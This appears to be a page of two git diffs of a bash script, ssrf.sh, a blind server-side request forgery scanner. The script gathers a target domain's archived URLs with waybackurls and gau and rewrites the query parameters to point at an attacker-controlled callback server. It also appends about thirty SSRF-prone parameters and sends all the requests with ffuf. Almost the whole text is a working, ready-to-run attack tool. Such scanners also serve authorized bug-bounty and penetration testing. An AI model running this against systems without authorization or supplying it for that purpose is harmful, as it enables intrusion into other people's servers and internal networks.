d1pakda5 · July 18, 2022 20:05 · Jul 18, 2022 · May 7, 2020
diff --git a/ssrf.sh b/ssrf.sh
@@ -12,7 +12,7 @@ fi
 echo "Getting WaybackURLS"
 waybackurls $1 > $1-ssrf.txt
 echo "Getting URLS with GAU"
-gau $1 >> $1-ssrf.txt
+gau --subs $1 >> $1-ssrf.txt
 echo "Putting them all together.."
 cat $1-ssrf.txt | sort | uniq | grep "?" | qsreplace -a | qsreplace $2 > $1-ssrf2.txt
 sed -i "s|$|\&dest=$2\&redirect=$2\&uri=$2\&path=$2\&continue=$2\&url=$2\&window=$2\&next=$2\&data=$2\&reference=$2\&site=$2\&html=$2\&val=$2\&validate=$2\&domain=$2\&callback=$2\&return=$2\&page=$2\&feed=$2\&host=$2&\port=$2\&to=$2\&out=$2\&view=$2\&dir=$2\&show=$2\&navigation=$2\&open=$2|g" $1-ssrf2.txt

diff --git a/ssrf.sh b/ssrf.sh
@@ -0,0 +1,20 @@
+echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
+echo "Usage: bash script.sh domain.com http://server-callbak"
+echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
+if [ -z "$1" ]; then
+  echo >&2 "ERROR: Domain not set"
+  exit 2
+fi
+if [ -z "$2" ]; then
+  echo >&2 "ERROR: Sever link not set"
+  exit 2
+fi
+echo "Getting WaybackURLS"
+waybackurls $1 > $1-ssrf.txt
+echo "Getting URLS with GAU"
+gau $1 >> $1-ssrf.txt
+echo "Putting them all together.."
+cat $1-ssrf.txt | sort | uniq | grep "?" | qsreplace -a | qsreplace $2 > $1-ssrf2.txt
+sed -i "s|$|\&dest=$2\&redirect=$2\&uri=$2\&path=$2\&continue=$2\&url=$2\&window=$2\&next=$2\&data=$2\&reference=$2\&site=$2\&html=$2\&val=$2\&validate=$2\&domain=$2\&callback=$2\&return=$2\&page=$2\&feed=$2\&host=$2&\port=$2\&to=$2\&out=$2\&view=$2\&dir=$2\&show=$2\&navigation=$2\&open=$2|g" $1-ssrf2.txt
+echo "Firing the requests - check your server for potential callbacks"
+ffuf -w $1-ssrf2.txt -u FUZZ -t 50